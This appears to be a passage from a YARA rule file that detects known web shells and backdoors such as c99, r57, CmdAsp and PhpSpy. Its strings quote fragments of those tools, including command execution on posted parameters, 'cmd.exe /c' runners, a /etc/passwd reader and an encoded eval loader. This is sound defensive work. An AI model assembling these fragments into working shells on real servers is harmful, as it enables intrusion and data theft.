rule FeliksPack3___PHP_Shells_xIShell {
	meta:
		description = "Webshells Auto-generated - file xIShell.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "997c8437c0621b4b753a546a53a88674"
	strings:
		// Windows-path backslash doubling followed by a JavaScript link cell.
		$win_path_escape = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
	condition:
		$win_path_escape
}
rule webshell_sig_404super {
	meta:
		description = "Web shells - generated from file 404super.php"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "7ed63176226f83d36dce47ce82507b28"
	strings:
		// 404super builds function names with pack('c*', ...) and hex-decodes a
		// remote URL via $GLOBALS lookups; any one fragment is distinctive.
		$pack_name = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
		$hex_url = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
		$session_comment = "//http://require.duapp.com/session.php" fullword
		$session_fetch = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
		$pass_comment = "//define('pass','123456');" fullword
		$globals_call = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
	condition:
		any of them
}
rule webshell_MySQL_Web_Interface_Version_0_8 {
	meta:
		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "36d4f34d0a22080f47bb1cb94107c60f"
	strings:
		// dumpTable link with dbname/tablename query parameters.
		$dump_link = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
	condition:
		$dump_link
}
rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
	meta:
		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
	strings:
		// NOTE(review): a single dropdown entry for "cat /etc/passwd" is the whole
		// rule; the same string also appears in WebShell_Liz0ziM_... below. It is
		// a weak anchor on its own (any UI offering that command would match), so
		// triage a lone hit from this rule together with the sibling rule's output.
		$passwd_option = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
	condition:
		$passwd_option
}
rule HYTop_DevPack_upload {
	meta:
		description = "Webshells Auto-generated - file upload.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "b09852bda534627949f0259828c967de"
	strings:
		// Section marker comment that HYTop DevPack emits above its upload page.
		$section_marker = "<!-- PageUpload Below -->"
	condition:
		$section_marker
}
rule perlbot_pl {
	meta:
		description = "Semi-Auto-generated  - file perlbot.pl.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
	strings:
		// Hard-coded admin nick list and the Portuguese shell-access toggle
		// comment from perlbot.pl; either fires.
		$admin_nicks = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
		$shell_toggle = "#Acesso a Shel - 1 ON 0 OFF"
	condition:
		$admin_nicks or $shell_toggle
}
rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
	meta:
		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
		author = "Florian Roth"
		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
	strings:
		// shell_exec() on POSTed "liz0"/"baba" fields, the banner and the
		// command dropdown. Any single fragment fires, so the generic
		// /etc/passwd option alone is enough to match.
		$exec_liz0 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
		$exec_baba = "$liz0=shell_exec($_POST[baba]); " fullword
		$banner = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
		$select_liz0 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
		$passwd_option = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
	condition:
		any of them
}
rule webshell_webshells_new_JSP {
	meta:
		description = "Web shells - generated from file JSP.jsp"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
	strings:
		// Single-letter command dispatcher (A = list roots, E = ..., etc.) of the
		// minified JSP.jsp sample; any one fragment fires.
		$list_roots = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
		$write_dispatch = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
		$realpath_dispatch = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
	condition:
		any of them
}
rule WebShell_go_shell {
	meta:
		description = "PHP Webshells Github Archive - file go-shell.php"
		author = "Florian Roth"
		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
	strings:
		// Perl CGI shell (GO.cgi) despite the .php archive name: default
		// command, pipe-open of "cd dir && cmd", heredoc tag and title.
		$password_note = "#change this password; for power security - delete this file =)" fullword
		$default_cmd = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
		$pipe_open = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
		$heredoc = "print << \"[kalabanga]\";" fullword
		$title = "<title>GO.cgi</title>" fullword
	condition:
		any of them
}
rule FSO_s_c99 {
	meta:
		description = "Webshells Auto-generated - file c99.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "5f9ba02eb081bba2b2434c603af454d0"
	strings:
		// c99's editable-extension list, in its exact original order.
		$ext_list = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
	condition:
		$ext_list
}
rule webshell_cmd_win32 {
	meta:
		description = "Web Shell - file cmd_win32.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
	strings:
		// Runtime.exec("cmd.exe /c " + request param) and the POST form. With
		// only two strings, "2 of them" is the same as requiring both.
		$exec_cmd = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
		$post_form = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
	condition:
		$exec_cmd and $post_form
}
rule byloader {
	meta:
		description = "Webshells Auto-generated - file byloader.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "0f0d6dc26055653f5844ded906ce52df"
	strings:
		// Service-installer strings: a fake "NtfsChk" service key and its
		// display name plus status messages. All five required.
		$service_key = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
		$denied_msg = "Failure ... Access is Denied !"
		$service_name = "NTFS Disk Driver Checking Service"
		$dump_msg = "Dumping Description to Registry..."
		$open_fail = "Opening Service .... Failure !"
	condition:
		$service_key and $denied_msg and $service_name and $dump_msg and $open_fail
}
rule WebShell_Worse_Linux_Shell {
	meta:
		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
		author = "Florian Roth"
		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
	strings:
		// Upload action check, IRC channel banner, headings, default command
		// and the backslash-unescaping of the POSTed command; two required.
		$upload_check = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
		$irc_banner = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
		$heading = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
		$default_cmd = "$currentCMD = \"ls -la\";" fullword
		$systype_row = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
		$cmd_unescape = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
	condition:
		2 of ($*)
}
rule WebShell_NTDaddy_v1_9 {
	meta:
		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
		author = "Florian Roth"
		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
	strings:
		// NTDaddy (ASP, despite the .php archive name): author line, temp-file
		// path builder, self-posting form and text-file error; two required.
		$author_line = "|     -obzerve : mr_o@ihateclowns.com |" fullword
		$temp_file = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
		$self_form = "<form action=ntdaddy.asp method=post>" fullword
		$not_text_err = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
	condition:
		2 of ($author_line, $temp_file, $self_form, $not_text_err)
}
rule Sincap_php_php {
	meta:
		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "b68b90ff6012a103e57d141ed38a7ee9"
	strings:
		// /tmp file read, an arithmetic helper and the aventgrup.net credit;
		// two required.
		$tmp_open = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
		$tampon_calc = "$tampon4=$tampon3-1"
		$credit_domain = "@aventgrup.net"
	condition:
		2 of ($tmp_open, $tampon_calc, $credit_domain)
}
rule webshell_Antichat_Shell_v1_3_2 {
	meta:
		description = "Web Shell - file Antichat Shell v1.3.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "40d0abceba125868be7f3f990f031521"
	strings:
		// Page header that titles itself "<host> - Antichat Shell".
		$header = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
	condition:
		$header
}
rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
	meta:
		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
		author = "Florian Roth"
		super_rule = 1
		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
	strings:
		// Turkish-named save form, dot-entry filter and folder button shared by
		// the three PH Vayv variants; two required.
		$save_form = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
		$dot_filter = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
		$folder_button = "name=\"duzenx2\" value=\"Klas" fullword
	condition:
		2 of ($save_form, $dot_filter, $folder_button)
}
rule webshell_asp_Ajan {
	meta:
		description = "Web Shell - file Ajan.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "b6f468252407efc2318639da22b08af0"
	strings:
		// Longer form of the FSO_s_ajan anchor: the generated script saves the
		// stream to c:\downloaded.zip.
		$stream_save_zip = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
	condition:
		$stream_save_zip
}
rule CmdAsp_asp {
	meta:
		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "64f24f09ec6efaa904e2492dffc518b9"
	strings:
		// Maceo's CmdAsp: file name, FileSystemObject creation, the "poor man's
		// pipe" comment and contact address. Two required; note the bare file
		// name alone is too generic to count for much.
		$file_name = "CmdAsp.asp"
		$fso_create = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
		$pipe_comment = "-- Use a poor man's pipe ... a temp file --"
		$contact = "maceo @ dogmile.com"
	condition:
		2 of ($file_name, $fso_create, $pipe_comment, $contact)
}
rule multiple_webshells_0001 {
	meta:
		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_1_c2007_php_php_c100_php"
		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
		hash1 = "d089e7168373a0634e1ac18c0ee00085"
		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
	strings:
		// chmod status line and SQL query link from the c100/c2007 family.
		$chmod_echo = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
		$sql_link = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
	condition:
		$chmod_echo or $sql_link
}
rule Antichat_Socks5_Server_php_php {
	meta:
		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
	strings:
		// SOCKS5 request parsing (port extraction, address-type comment) and the
		// antichat.ru credit; any one fires.
		$port_parse = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
		$atype_comment = "#   [+] Domain name address type"
		$credit_site = "www.antichat.ru"
	condition:
		any of them
}
rule FSO_s_sincap {
	meta:
		description = "Webshells Auto-generated - file sincap.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
	strings:
		// NOTE(review): both anchors are plain presentational HTML (font tag and
		// body colours) rather than shell logic; they are only meaningful together
		// and a hit should be confirmed against the sample hash or file content.
		$font_tag = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
		$body_tag = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
	condition:
		$font_tag and $body_tag
}
rule WebShell_CmdAsp_asp_php {
	meta:
		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
		author = "Florian Roth"
		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
	strings:
		// Fuller CmdAsp fingerprint (see also CmdAsp_asp and webshell_asp_cmdasp
		// in this file): header comments, temp-file pipe, cmd.exe run and the
		// WScript.Network whoami line. Four of nine required.
		$temp_file = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
		$author_comment = "' Author: Maceo <maceo @ dogmile.com>" fullword
		$pipe_comment = "' -- Use a poor man's pipe ... a temp file -- '" fullword
		$divider_comment = "' --------------------o0o--------------------" fullword
		$file_comment = "' File: CmdAsp.asp" fullword
		$html_marker = "<-- CmdAsp.asp -->" fullword
		$cmd_run = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
		$wscript_net = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
		$whoami_line = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
	condition:
		4 of ($*)
}
rule webshell_customize {
	meta:
		description = "Web Shell - file customize.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "d55578eccad090f30f5d735b8ec530b1"
	strings:
		// Same "z0" charset handler as webshell_jsp_utils above, here standing
		// alone; a file with that line hits both rules.
		$z0_charset = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
	condition:
		$z0_charset
}
rule multiple_webshells_0024 {
	meta:
		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_antichat_php_php_Fatalshell_php_php_a_gedit_php_php"
		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
	strings:
		// File save, phpeval action, upload path builder and cwd helper; two
		// required (the cwd line on its own is ordinary PHP).
		$save_file = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
		$phpeval_action = "if($action==\"phpeval\"){" fullword
		$upload_path = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
		$cwd_line = "$dir=getcwd().\"/\";" fullword
	condition:
		2 of ($save_file, $phpeval_action, $upload_path, $cwd_line)
}
rule webshell_mysqlwebsh {
	meta:
		description = "Web Shell - file mysqlwebsh.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "babfa76d11943a22484b3837f105fada"
	strings:
		// Table cell whose colour depends on connection state and "chparam".
		$conn_cell = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
	condition:
		$conn_cell
}
rule myshell_php_php {
	meta:
		description = "Semi-Auto-generated  - file myshell.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "62783d1db52d05b1b6ae2403a7044490"
	strings:
		// MyShell chdir error, editor banner and file-info line; two required.
		$chdir_err = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
		$editor_banner = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
		$file_info = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
	condition:
		2 of ($chdir_err, $editor_banner, $file_info)
}
rule Zehir_4_asp {
	meta:
		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "7f4e12e159360743ec016273c3b9108c"
	strings:
		// Zehir status-link builder and the Turkish "Test Et!" button; either
		// fires. Same sample hash as webshell_ASP_zehir4 further down.
		$status_link = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
		$test_button = "<input type=submit value=\"Test Et!\" onclick=\""
	condition:
		$status_link or $test_button
}
rule _root_040_zip_Folder_deploy {
	meta:
		description = "Webshells Auto-generated - file deploy.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "2c9f9c58999256c73a5ebdb10a9be269"
	strings:
		// Usage text of the bundled "halon" SYN scanner; both lines required.
		$synscan_usage = "halon synscan 127.0.0.1 1-65536"
		$target_hint = "Obviously you replace the ip address with that of the target."
	condition:
		$synscan_usage and $target_hint
}
rule webshell_phpshell3 {
	meta:
		description = "Web Shell - file phpshell3.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "76117b2ee4a7ac06832d50b2d04070b8"
	strings:
		// phpshell3: session "nounce" hidden field, login form and the cd error
		// buffered into $_SESSION['output']; two required.
		$nounce_field = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
		$username_field = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
		$cd_error = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
	condition:
		2 of ($nounce_field, $username_field, $cd_error)
}
rule AJAX_FileUpload_webshell {
	meta:
		description = "AJAX JS/CSS components providing web shell by APT groups"
		author = "F.Roth"
		date = "12.10.2014"
		score = 75
		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
	strings:
		// Three lines from the ajaxfileupload.js helper shipped with the
		// referenced file manager. NOTE(review): these lines describe a generic
		// jQuery iframe-upload plugin rather than shell logic, so a hit on an
		// unrelated web application that bundles the same plugin is plausible;
		// confirm by checking what the surrounding file manager does.
		$frame_id = "var frameId = 'jUploadFrame' + id;" ascii
		$upload_form = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
		$eval_scripts = "jQuery(\"<div>\").html(data).evalScripts();" ascii
	condition:
		$frame_id and $upload_form and $eval_scripts
}
rule STNC_php_php {
	meta:
		description = "Semi-Auto-generated  - file STNC.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
	strings:
		// Domain, download-form builder, product name and forum link; any one
		// fires, so a bare drmist.ru reference is enough on its own.
		$domain = "drmist.ru" fullword
		$download_form = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
		$product = "STNC WebShell"
		$forum_link = "http://www.security-teams.net/index.php?showtopic="
	condition:
		any of them
}
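rule webshell_jsp_guige02 {
	meta:
		description = "Web Shell - file guige02.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "a3b8b2280c56eaab777d633535baf21d"
	strings:
		// The first anchor used to start with sixteen literal '?' characters, most
		// likely the residue of non-ASCII bytes (the page declares charset=GBK)
		// that were replaced when the rule was generated. A file that still
		// carries the real bytes never contains that run, and with an AND
		// condition the rule could not fire on it. The anchor is trimmed to the
		// part that survives intact; anything the old string matched still does.
		$body_title = "%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
		$page_directive = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
	condition:
		$body_title and $page_directive
}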
rule HYTop2006_rar_Folder_2006X {
	meta:
		description = "Webshells Auto-generated - file 2006X.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
	strings:
		// NOTE(review): both anchors are ordinary HTML form fields (a password
		// input and a "theAction" text input) embedded in the 2006X.exe sample;
		// they are only meaningful together and can legitimately occur in other
		// login pages, so verify a hit against the sample hash.
		$password_input = "<input name=\"password\" type=\"password\" id=\"password\""
		$action_input = "name=\"theAction\" type=\"text\" id=\"theAction\""
	condition:
		$password_input and $action_input
}
rule WebShell_WinX_Shell {
	meta:
		description = "PHP Webshells Github Archive - file WinX Shell.php"
		author = "Florian Roth"
		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
	strings:
		// GreenwooD's WinX shell: source comments, page title and the upload
		// check; three of five required.
		$simple_comment = "// It's simple shell for all Win OS." fullword
		$netstat_comment = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
		$title = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
		$author_comment = "// Created by greenwood from n57" fullword
		$upload_check = " if (is_uploaded_file($userfile)) {" fullword
	condition:
		3 of ($*)
}
rule fuckphpshell_php {
	meta:
		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "554e50c1265bb0934fcc8247ec3b9052"
	strings:
		// Warning prefix, "priv3 server" notice, members-area banner and the
		// output-cache regex; two required.
		$warn_prefix = "$succ = \"Warning! "
		$priv3_notice = "Don`t be stupid .. this is a priv3 server, so take extra care!"
		$members_banner = "\\*=-- MEMBERS AREA --=*/"
		$cache_regex = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
	condition:
		2 of ($warn_prefix, $priv3_notice, $members_banner, $cache_regex)
}
rule WebShell_PHANTASMA {
	meta:
		description = "PHP Webshells Github Archive - file PHANTASMA.php"
		author = "Florian Roth"
		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
	strings:
		// Embedded C source usage line, port-scan branch, banner echo and
		// current-user lookup; three of four required.
		$c_usage = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
		$portscan_branch = "if ($portscan != \"\") {" fullword
		$banner_echo = "echo \"<br>Banner: $get <br>\";" fullword
		$current_user = "$dono = get_current_user( );" fullword
	condition:
		3 of ($c_usage, $portscan_branch, $banner_echo, $current_user)
}
rule webshell_ASP_zehir4 {
	meta:
		description = "Web Shell - file zehir4.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "7f4e12e159360743ec016273c3b9108c"
	strings:
		// Zehir status=7 link writer; same sample as Zehir_4_asp above.
		$status7_link = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
	condition:
		$status7_link
}
rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
	meta:
		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
		hash1 = "f3ca29b7999643507081caab926e2e74"
		hash2 = "527cf81f9272919bf872007e21c4bdda"
	strings:
		// Upload-path input and the user-controlled destination path logic
		// shared by NIX REMOTE WEB-SHELL and KAdot; two required.
		$path_input = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
		$upload_dest = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
		$ac_param = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
		$empty_path = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
	condition:
		2 of ($path_input, $upload_dest, $ac_param, $empty_path)
}
rule thelast_orice2 {
    // Both fragments are required. They are very short and generic
    // (a GET parameter copied into $aa and echoed back), so treat a hit
    // as a trigger for manual review rather than a conviction on its own.
    meta:
        description = "Webshells Auto-generated - file orice2.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "aa63ffb27bde8d03d00dda04421237ae"
    strings:
        $x1 = " $aa = $_GET['aa'];" ascii
        $x2 = "echo $aa;" ascii
    condition:
        $x1 and $x2
}
rule Debug_BDoor {
    // Requires the "\BDoor\" path fragment together with the Run
    // autostart key; the Run key alone is far too common to be a signal.
    meta:
        description = "Webshells Auto-generated - file BDoor.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "e4e8e31dd44beb9320922c5f49739955"
    strings:
        $x1 = "\\BDoor\\" ascii
        $x2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
    condition:
        $x1 and $x2
}
rule WebShell_PhpSpy_Ver_2006 {
    // Any one of the four POST-driven registry / process / program
    // fragments is enough to match.
    meta:
        description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
        author = "Florian Roth"
        hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
    strings:
        $x1 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword ascii
        $x2 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname." ascii
        $x3 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32" ascii
        $x4 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'" ascii
    condition:
        any of them
}
rule webshell_r57shell127_r57_kartal_r57 {
    // Super rule for three r57 variants; two of the three directory /
    // database / HTTP-auth fragments must be present.
    meta:
        description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "ae025c886fbe7f9ed159f49593674832"
        hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
        hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
    strings:
        $x1 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword ascii
        $x2 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword ascii
        $x3 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_" ascii
    condition:
        2 of ($x*)
}
rule multiple_php_webshells {
    // The three indicators are base64 fragments of an embedded payload;
    // two of them must be present.
    meta:
        description = "Semi-Auto-generated  - from files multiple_php_webshells"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
        hash1 = "911195a9b7c010f61b66439d9048f400"
        hash2 = "be0f67f3e995517d18859ed57b4b4389"
        hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
        hash4 = "8023394542cddf8aee5dec6072ed02b5"
        hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
        hash6 = "817671e1bdc85e04cc3440bbd9288800"
        hash7 = "7101fe72421402029e2629f3aaed6de7"
        hash8 = "f618f41f7ebeb5e5076986a66593afd1"
    strings:
        $x1 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI" ascii
        $x2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0" ascii
        $x3 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg" ascii
    condition:
        2 of ($x*)
}
rule webshell_dev_core {
    // Any single fragment matches: a User-Agent gate, a cookie set from
    // $_POST['pwd'], a packed-hex request, an HTTP status regex, a nested
    // gzuncompress/eval and an fsockopen call.
    meta:
        description = "Web shells - generated from file dev_core.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "55ad9309b006884f660c41e53150fc2e"
    strings:
        $x1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword ascii
        $x2 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword ascii
        $x3 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874" ascii
        $x4 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))" ascii
        $x5 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C" ascii
        $x6 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))" ascii
    condition:
        any of them
}
rule Phyton_Shell_py {
    // Any one of the four d00r.py fragments (os.popen shell invocation,
    // header comment, help text, PW/PORT/HOST print) matches.
    meta:
        description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "92b3c897090867c65cc169ab037a0f55"
    strings:
        $x1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword ascii
